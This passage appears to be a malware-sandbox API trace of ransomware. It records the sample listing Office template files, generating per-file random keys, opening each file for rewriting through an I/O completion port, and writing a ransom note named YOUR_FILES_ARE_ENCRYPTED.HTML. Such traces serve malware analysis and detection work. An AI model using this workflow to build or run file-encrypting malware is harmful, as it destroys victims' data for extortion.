ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f175e, dwReserved1=0x6f1678, cFileName=".", cAlternateFileName="")) returned 0x626978 [0123.239] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x985f9d53, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f9d53, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f175e, dwReserved1=0x6f1678, cFileName="..", cAlternateFileName="")) returned 1 [0123.239] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980dfb29, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980dfb29, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x980e0ec2, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xca72, dwReserved0=0x6f175e, dwReserved1=0x6f1678, cFileName="TM01840907[[fn=Equations]].dotx", cAlternateFileName="TM0184~1.DOT")) returned 1 [0123.239] StrStrIW (lpFirst="TM01840907[[fn=Equations]].dotx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.239] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM01840907[[fn=Equations]].dotx") returned 151 [0123.239] PathFindExtensionW (pszPath="TM01840907[[fn=Equations]].dotx") returned=".dotx" [0123.239] lstrlenW (lpString=".dotx") returned 5 [0123.239] PathFindExtensionW (pszPath="TM01840907[[fn=Equations]].dotx") returned=".dotx" [0123.239] SystemFunction036 (in: RandomBuffer=0x19d51c, RandomBufferLength=0x20 | out: RandomBuffer=0x19d51c) returned 1 [0123.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM01840907[[fn=Equations]].dotx" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document building blocks\\1033\\tm01840907[[fn=equations]].dotx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0123.241] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d540 | out: lpFileSize=0x19d540*=51826) returned 1 [0123.241] GetProcessHeap () returned 0x600000 [0123.241] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0123.243] wsprintfW (in: param_1=0x19d45a, param_2="%02X" | out: param_1="CD") returned 2 [0123.243] wsprintfW (in: param_1=0x19d45e, param_2="%02X" | out: param_1="48") returned 2 [0123.243] wsprintfW (in: param_1=0x19d462, param_2="%02X" | out: param_1="F3") returned 2 [0123.243] wsprintfW (in: param_1=0x19d466, param_2="%02X" | out: param_1="CE") returned 2 [0123.243] wsprintfW (in: param_1=0x19d46a, param_2="%02X" | out: param_1="11") returned 2 [0123.243] wsprintfW (in: param_1=0x19d46e, param_2="%02X" | out: param_1="3D") returned 2 [0123.244] wsprintfW (in: param_1=0x19d472, param_2="%02X" | out: param_1="DE") returned 2 [0123.244] wsprintfW (in: param_1=0x19d476, param_2="%02X" | out: param_1="F6") returned 2 [0123.244] wsprintfW (in: param_1=0x19d47a, param_2="%02X" | out: param_1="96") returned 2 [0123.244] wsprintfW (in: param_1=0x19d47e, param_2="%02X" | out: param_1="12") returned 2 [0123.244] wsprintfW (in: param_1=0x19d482, param_2="%02X" | out: param_1="ED") returned 2 [0123.244] wsprintfW (in: param_1=0x19d486, param_2="%02X" | out: param_1="0B") returned 2 [0123.244] wsprintfW (in: param_1=0x19d48a, param_2="%02X" | out: param_1="A7") returned 2 [0123.244] wsprintfW (in: param_1=0x19d48e, param_2="%02X" | out: param_1="90") returned 2 [0123.244] wsprintfW (in: param_1=0x19d492, param_2="%02X" | out: param_1="B0") returned 2 [0123.244] wsprintfW (in: param_1=0x19d496, param_2="%02X" | out: param_1="90") returned 2 [0123.244] wsprintfW (in: param_1=0x19d49a, param_2="%02X" | out: param_1="B3") returned 2 [0123.244] wsprintfW (in: param_1=0x19d49e, param_2="%02X" | out: param_1="D1") returned 2 [0123.244] wsprintfW (in: param_1=0x19d4a2, param_2="%02X" | out: param_1="6F") returned 2 [0123.244] wsprintfW (in: param_1=0x19d4a6, param_2="%02X" | out: param_1="75") returned 2 [0123.244] wsprintfW (in: param_1=0x19d4aa, param_2="%02X" | out: param_1="D5") returned 2 [0123.244] wsprintfW (in: param_1=0x19d4ae, param_2="%02X" | out: param_1="C6") returned 2 [0123.244] wsprintfW (in: param_1=0x19d4b2, param_2="%02X" | out: param_1="C5") returned 2 [0123.244] wsprintfW (in: param_1=0x19d4b6, param_2="%02X" | out: param_1="5D") returned 2 [0123.244] wsprintfW (in: param_1=0x19d4ba, param_2="%02X" | out: param_1="A8") returned 2 [0123.244] wsprintfW (in: param_1=0x19d4be, param_2="%02X" | out: param_1="47") returned 2 [0123.244] wsprintfW (in: param_1=0x19d4c2, param_2="%02X" | out: param_1="7E") returned 2 [0123.244] wsprintfW (in: param_1=0x19d4c6, param_2="%02X" | out: param_1="86") returned 2 [0123.244] wsprintfW (in: param_1=0x19d4ca, param_2="%02X" | out: param_1="AD") returned 2 [0123.244] wsprintfW (in: param_1=0x19d4ce, param_2="%02X" | out: param_1="E1") returned 2 [0123.244] wsprintfW (in: param_1=0x19d4d2, param_2="%02X" | out: param_1="C4") returned 2 [0123.244] wsprintfW (in: param_1=0x19d4d6, param_2="%02X" | out: param_1="41") returned 2 [0123.246] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM01840907[[fn=Equations]].dotx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM01840907[[fn=Equations]].dotx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM01840907[[fn=Equations]].dotx" [0123.246] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.246] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0123.246] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980cc2bb, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980cc2bb, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x980cc2bb, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xb8c0, dwReserved0=0x6f175e, dwReserved1=0x6f1678, cFileName="TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx", cAlternateFileName="TM0283~1.DOC")) returned 1 [0123.246] StrStrIW (lpFirst="TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.246] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx") returned 191 [0123.246] PathFindExtensionW (pszPath="TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx") returned=".docx" [0123.246] lstrlenW (lpString=".docx") returned 5 [0123.246] PathFindExtensionW (pszPath="TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx") returned=".docx" [0123.246] SystemFunction036 (in: RandomBuffer=0x19d51c, RandomBufferLength=0x20 | out: RandomBuffer=0x19d51c) returned 1 [0123.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document building blocks\\1033\\tm02835233[[fn=text sidebar (annual report red and black design)]].docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0123.248] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19d540 | out: lpFileSize=0x19d540*=47296) returned 1 [0123.248] GetProcessHeap () returned 0x600000 [0123.248] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0123.251] wsprintfW (in: param_1=0x19d45a, param_2="%02X" | out: param_1="5D") returned 2 [0123.251] wsprintfW (in: param_1=0x19d45e, param_2="%02X" | out: param_1="9F") returned 2 [0123.251] wsprintfW (in: param_1=0x19d462, param_2="%02X" | out: param_1="9B") returned 2 [0123.252] wsprintfW (in: param_1=0x19d466, param_2="%02X" | out: param_1="EE") returned 2 [0123.252] wsprintfW (in: param_1=0x19d46a, param_2="%02X" | out: param_1="7B") returned 2 [0123.254] wsprintfW (in: param_1=0x19d46e, param_2="%02X" | out: param_1="E7") returned 2 [0123.254] wsprintfW (in: param_1=0x19d472, param_2="%02X" | out: param_1="EB") returned 2 [0123.254] wsprintfW (in: param_1=0x19d476, param_2="%02X" | out: param_1="A3") returned 2 [0123.254] wsprintfW (in: param_1=0x19d47a, param_2="%02X" | out: param_1="FF") returned 2 [0123.254] wsprintfW (in: param_1=0x19d47e, param_2="%02X" | out: param_1="4F") returned 2 [0123.254] wsprintfW (in: param_1=0x19d482, param_2="%02X" | out: param_1="EB") returned 2 [0123.254] wsprintfW (in: param_1=0x19d486, param_2="%02X" | out: param_1="CB") returned 2 [0123.255] wsprintfW (in: param_1=0x19d48a, param_2="%02X" | out: param_1="36") returned 2 [0123.255] wsprintfW (in: param_1=0x19d48e, param_2="%02X" | out: param_1="5A") returned 2 [0123.255] wsprintfW (in: param_1=0x19d492, param_2="%02X" | out: param_1="97") returned 2 [0123.255] wsprintfW (in: param_1=0x19d496, param_2="%02X" | out: param_1="77") returned 2 [0123.256] wsprintfW (in: param_1=0x19d49a, param_2="%02X" | out: param_1="4E") returned 2 [0123.256] wsprintfW (in: param_1=0x19d49e, param_2="%02X" | out: param_1="E4") returned 2 [0123.256] wsprintfW (in: param_1=0x19d4a2, param_2="%02X" | out: param_1="2F") returned 2 [0123.257] wsprintfW (in: param_1=0x19d4a6, param_2="%02X" | out: param_1="0B") returned 2 [0123.257] wsprintfW (in: param_1=0x19d4aa, param_2="%02X" | out: param_1="7E") returned 2 [0123.257] wsprintfW (in: param_1=0x19d4ae, param_2="%02X" | out: param_1="D1") returned 2 [0123.257] wsprintfW (in: param_1=0x19d4b2, param_2="%02X" | out: param_1="D9") returned 2 [0123.257] wsprintfW (in: param_1=0x19d4b6, param_2="%02X" | out: param_1="72") returned 2 [0123.257] wsprintfW (in: param_1=0x19d4ba, param_2="%02X" | out: param_1="77") returned 2 [0123.257] wsprintfW (in: param_1=0x19d4be, param_2="%02X" | out: param_1="6D") returned 2 [0123.257] wsprintfW (in: param_1=0x19d4c2, param_2="%02X" | out: param_1="1F") returned 2 [0123.257] wsprintfW (in: param_1=0x19d4c6, param_2="%02X" | out: param_1="B2") returned 2 [0123.257] wsprintfW (in: param_1=0x19d4ca, param_2="%02X" | out: param_1="11") returned 2 [0123.261] wsprintfW (in: param_1=0x19d4ce, param_2="%02X" | out: param_1="8F") returned 2 [0123.261] wsprintfW (in: param_1=0x19d4d2, param_2="%02X" | out: param_1="84") returned 2 [0123.261] wsprintfW (in: param_1=0x19d4d6, param_2="%02X" | out: param_1="0D") returned 2 [0123.261] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx" [0123.262] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.262] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0123.262] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98167377, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98167377, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98167377, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x866f, dwReserved0=0x6f175e, dwReserved1=0x6f1678, cFileName="TM03998158[[fn=Element]].dotx", cAlternateFileName="TM0399~1.DOT")) returned 1 [0123.262] StrStrIW (lpFirst="TM03998158[[fn=Element]].dotx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.262] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998158[[fn=Element]].dotx") returned 149 [0123.264] PathFindExtensionW (pszPath="TM03998158[[fn=Element]].dotx") returned=".dotx" [0123.264] lstrlenW (lpString=".dotx") returned 5 [0123.264] PathFindExtensionW (pszPath="TM03998158[[fn=Element]].dotx") returned=".dotx" [0123.264] SystemFunction036 (in: RandomBuffer=0x19d51c, RandomBufferLength=0x20 | out: RandomBuffer=0x19d51c) returned 1 [0123.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998158[[fn=Element]].dotx" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document building blocks\\1033\\tm03998158[[fn=element]].dotx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0123.268] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19d540 | out: lpFileSize=0x19d540*=34415) returned 1 [0123.269] GetProcessHeap () returned 0x600000 [0123.269] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0123.270] wsprintfW (in: param_1=0x19d45a, param_2="%02X" | out: param_1="3D") returned 2 [0123.270] wsprintfW (in: param_1=0x19d45e, param_2="%02X" | out: param_1="BA") returned 2 [0123.270] wsprintfW (in: param_1=0x19d462, param_2="%02X" | out: param_1="FC") returned 2 [0123.270] wsprintfW (in: param_1=0x19d466, param_2="%02X" | out: param_1="0A") returned 2 [0123.270] wsprintfW (in: param_1=0x19d46a, param_2="%02X" | out: param_1="0A") returned 2 [0123.270] wsprintfW (in: param_1=0x19d46e, param_2="%02X" | out: param_1="BA") returned 2 [0123.270] wsprintfW (in: param_1=0x19d472, param_2="%02X" | out: param_1="0C") returned 2 [0123.270] wsprintfW (in: param_1=0x19d476, param_2="%02X" | out: param_1="D7") returned 2 [0123.270] wsprintfW (in: param_1=0x19d47a, param_2="%02X" | out: param_1="B0") returned 2 [0123.270] wsprintfW (in: param_1=0x19d47e, param_2="%02X" | out: param_1="8B") returned 2 [0123.270] wsprintfW (in: param_1=0x19d482, param_2="%02X" | out: param_1="D8") returned 2 [0123.270] wsprintfW (in: param_1=0x19d486, param_2="%02X" | out: param_1="37") returned 2 [0123.270] wsprintfW (in: param_1=0x19d48a, param_2="%02X" | out: param_1="68") returned 2 [0123.270] wsprintfW (in: param_1=0x19d48e, param_2="%02X" | out: param_1="89") returned 2 [0123.270] wsprintfW (in: param_1=0x19d492, param_2="%02X" | out: param_1="89") returned 2 [0123.270] wsprintfW (in: param_1=0x19d496, param_2="%02X" | out: param_1="ED") returned 2 [0123.270] wsprintfW (in: param_1=0x19d49a, param_2="%02X" | out: param_1="E3") returned 2 [0123.270] wsprintfW (in: param_1=0x19d49e, param_2="%02X" | out: param_1="B2") returned 2 [0123.270] wsprintfW (in: param_1=0x19d4a2, param_2="%02X" | out: param_1="F1") returned 2 [0123.270] wsprintfW (in: param_1=0x19d4a6, param_2="%02X" | out: param_1="C4") returned 2 [0123.270] wsprintfW (in: param_1=0x19d4aa, param_2="%02X" | out: param_1="71") returned 2 [0123.270] wsprintfW (in: param_1=0x19d4ae, param_2="%02X" | out: param_1="B9") returned 2 [0123.270] wsprintfW (in: param_1=0x19d4b2, param_2="%02X" | out: param_1="9A") returned 2 [0123.270] wsprintfW (in: param_1=0x19d4b6, param_2="%02X" | out: param_1="2D") returned 2 [0123.271] wsprintfW (in: param_1=0x19d4ba, param_2="%02X" | out: param_1="1A") returned 2 [0123.271] wsprintfW (in: param_1=0x19d4be, param_2="%02X" | out: param_1="A4") returned 2 [0123.271] wsprintfW (in: param_1=0x19d4c2, param_2="%02X" | out: param_1="1A") returned 2 [0123.271] wsprintfW (in: param_1=0x19d4c6, param_2="%02X" | out: param_1="FD") returned 2 [0123.271] wsprintfW (in: param_1=0x19d4ca, param_2="%02X" | out: param_1="F8") returned 2 [0123.271] wsprintfW (in: param_1=0x19d4ce, param_2="%02X" | out: param_1="F6") returned 2 [0123.271] wsprintfW (in: param_1=0x19d4d2, param_2="%02X" | out: param_1="E9") returned 2 [0123.271] wsprintfW (in: param_1=0x19d4d6, param_2="%02X" | out: param_1="5A") returned 2 [0123.272] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998158[[fn=Element]].dotx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998158[[fn=Element]].dotx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998158[[fn=Element]].dotx" [0123.272] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.272] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0123.272] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9846e6c1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9846e6c1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f3b86, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x34df74, dwReserved0=0x6f175e, dwReserved1=0x6f1678, cFileName="TM03998159[[fn=Insight]].dotx", cAlternateFileName="TM0399~2.DOT")) returned 1 [0123.272] StrStrIW (lpFirst="TM03998159[[fn=Insight]].dotx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.272] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998159[[fn=Insight]].dotx") returned 149 [0123.274] PathFindExtensionW (pszPath="TM03998159[[fn=Insight]].dotx") returned=".dotx" [0123.274] lstrlenW (lpString=".dotx") returned 5 [0123.283] PathFindExtensionW (pszPath="TM03998159[[fn=Insight]].dotx") returned=".dotx" [0123.283] SystemFunction036 (in: RandomBuffer=0x19d51c, RandomBufferLength=0x20 | out: RandomBuffer=0x19d51c) returned 1 [0123.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998159[[fn=Insight]].dotx" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document building blocks\\1033\\tm03998159[[fn=insight]].dotx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0123.286] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19d540 | out: lpFileSize=0x19d540*=3465076) returned 1 [0123.286] GetProcessHeap () returned 0x600000 [0123.286] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0123.289] wsprintfW (in: param_1=0x19d45a, param_2="%02X" | out: param_1="B1") returned 2 [0123.289] wsprintfW (in: param_1=0x19d45e, param_2="%02X" | out: param_1="E9") returned 2 [0123.289] wsprintfW (in: param_1=0x19d462, param_2="%02X" | out: param_1="96") returned 2 [0123.289] wsprintfW (in: param_1=0x19d466, param_2="%02X" | out: param_1="23") returned 2 [0123.289] wsprintfW (in: param_1=0x19d46a, param_2="%02X" | out: param_1="64") returned 2 [0123.289] wsprintfW (in: param_1=0x19d46e, param_2="%02X" | out: param_1="B8") returned 2 [0123.289] wsprintfW (in: param_1=0x19d472, param_2="%02X" | out: param_1="90") returned 2 [0123.289] wsprintfW (in: param_1=0x19d476, param_2="%02X" | out: param_1="79") returned 2 [0123.289] wsprintfW (in: param_1=0x19d47a, param_2="%02X" | out: param_1="34") returned 2 [0123.289] wsprintfW (in: param_1=0x19d47e, param_2="%02X" | out: param_1="50") returned 2 [0123.289] wsprintfW (in: param_1=0x19d482, param_2="%02X" | out: param_1="BF") returned 2 [0123.289] wsprintfW (in: param_1=0x19d486, param_2="%02X" | out: param_1="D3") returned 2 [0123.289] wsprintfW (in: param_1=0x19d48a, param_2="%02X" | out: param_1="D4") returned 2 [0123.289] wsprintfW (in: param_1=0x19d48e, param_2="%02X" | out: param_1="65") returned 2 [0123.289] wsprintfW (in: param_1=0x19d492, param_2="%02X" | out: param_1="C3") returned 2 [0123.289] wsprintfW (in: param_1=0x19d496, param_2="%02X" | out: param_1="9C") returned 2 [0123.289] wsprintfW (in: param_1=0x19d49a, param_2="%02X" | out: param_1="E8") returned 2 [0123.289] wsprintfW (in: param_1=0x19d49e, param_2="%02X" | out: param_1="07") returned 2 [0123.289] wsprintfW (in: param_1=0x19d4a2, param_2="%02X" | out: param_1="88") returned 2 [0123.289] wsprintfW (in: param_1=0x19d4a6, param_2="%02X" | out: param_1="D4") returned 2 [0123.289] wsprintfW (in: param_1=0x19d4aa, param_2="%02X" | out: param_1="47") returned 2 [0123.289] wsprintfW (in: param_1=0x19d4ae, param_2="%02X" | out: param_1="E8") returned 2 [0123.289] wsprintfW (in: param_1=0x19d4b2, param_2="%02X" | out: param_1="0F") returned 2 [0123.289] wsprintfW (in: param_1=0x19d4b6, param_2="%02X" | out: param_1="46") returned 2 [0123.289] wsprintfW (in: param_1=0x19d4ba, param_2="%02X" | out: param_1="85") returned 2 [0123.289] wsprintfW (in: param_1=0x19d4be, param_2="%02X" | out: param_1="FB") returned 2 [0123.289] wsprintfW (in: param_1=0x19d4c2, param_2="%02X" | out: param_1="DA") returned 2 [0123.289] wsprintfW (in: param_1=0x19d4c6, param_2="%02X" | out: param_1="5B") returned 2 [0123.290] wsprintfW (in: param_1=0x19d4ca, param_2="%02X" | out: param_1="54") returned 2 [0123.290] wsprintfW (in: param_1=0x19d4ce, param_2="%02X" | out: param_1="AE") returned 2 [0123.290] wsprintfW (in: param_1=0x19d4d2, param_2="%02X" | out: param_1="BF") returned 2 [0123.290] wsprintfW (in: param_1=0x19d4d6, param_2="%02X" | out: param_1="72") returned 2 [0123.290] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998159[[fn=Insight]].dotx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998159[[fn=Insight]].dotx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998159[[fn=Insight]].dotx" [0123.290] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.290] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0123.291] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9846e6c1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9846e6c1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f3b86, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x34df74, dwReserved0=0x6f175e, dwReserved1=0x6f1678, cFileName="TM03998159[[fn=Insight]].dotx", cAlternateFileName="TM0399~2.DOT")) returned 0 [0123.291] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0123.292] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 149 [0123.292] GetProcessHeap () returned 0x600000 [0123.292] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document building blocks\\1033\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0123.297] WriteFile (in: hFile=0x214, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19d840, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19d840*=0x3c00, lpOverlapped=0x0) returned 1 [0123.298] CloseHandle (hObject=0x214) returned 1 [0123.298] GetProcessHeap () returned 0x600000 [0123.298] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.299] GetProcessHeap () returned 0x600000 [0123.299] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 